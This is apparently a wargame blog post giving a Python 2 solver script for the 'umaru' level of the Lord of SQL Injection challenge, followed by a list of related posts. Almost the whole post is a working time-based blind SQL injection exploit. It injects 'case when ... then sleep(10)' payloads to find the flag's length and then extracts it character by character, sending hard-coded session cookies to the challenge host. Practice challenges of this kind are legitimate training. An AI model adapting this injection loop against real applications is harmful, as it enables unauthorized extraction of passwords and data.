import urllib2
import time
def request(data):
start = time.time()
url = "https://los.eagle-jump.org/umaru_6f977f0504e56eeb72967f35eadbfdf5.php?flag="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=iaqbaeq8kf93g61qgl0edanf16')
response = urllib2.urlopen(req).read()
end = time.time() - start
return end
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!_@"
for i in range(0,50):
payload = "1 and case when length(flag)="+str(i)+" then sleep(10) else 0 end or (select 1 union select 2)"
if request(payload)>9:
length = i
break
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = "1 and case when flag like '"+admin_pw+strings[i]+"%' then sleep(10) else 0 end or (select 1 union select 2)"
if request(payload)>9:
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS2 hell_fire (0) | 2018.10.10 |
|---|---|
| LOS All Clear (0) | 2018.02.09 |
| LOS evil_wizard (0) | 2018.02.09 |
| LOS hell_fire (0) | 2018.02.09 |
| LOS dark_eyes (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간